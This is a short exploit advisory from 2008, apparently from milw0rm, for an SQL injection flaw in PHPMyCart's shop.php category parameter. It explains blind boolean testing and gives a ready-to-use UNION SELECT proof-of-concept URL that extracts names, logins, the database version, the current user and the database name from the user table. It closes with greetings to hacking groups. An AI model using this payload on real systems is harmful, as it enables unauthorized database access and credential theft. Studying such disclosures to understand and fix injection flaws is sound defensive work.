35 lines
No EOL
922 B
Text
35 lines
No EOL
922 B
Text
######################
|
|
#
|
|
#PHPMyCart Injection Vulnerability
|
|
#
|
|
######################
|
|
#
|
|
#Bug by: h0yt3r
|
|
#
|
|
##
|
|
###
|
|
##
|
|
#
|
|
#Script suffers from a not correctly verified category id variable which is used in SQL Querys.
|
|
#An Attacker can easily get sensitive information from the database by
|
|
#injecting unexpected SQL Querys.
|
|
#
|
|
#We dont get any SQL Errors when the Injection Query appear to be false.
|
|
#However we have to look for content changing when we inject.
|
|
#Look at AND 1=1/AND 1=0
|
|
#All rows are echoed on the left side.
|
|
#
|
|
#SQL Injection:
|
|
#http://[target]/[path]/shop.php?cat=[SQL]
|
|
#
|
|
#PoC:
|
|
#shop.php?cat=2%20and%201=0%20union%20select%201,concat(name,0x3a,login,0x3a,@@VERSION,0x3a,user(),0x3a,database())%20from%20user
|
|
#
|
|
#######################
|
|
#
|
|
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
|
|
#
|
|
#######################
|
|
#######################
|
|
|
|
# milw0rm.com [2008-06-14] |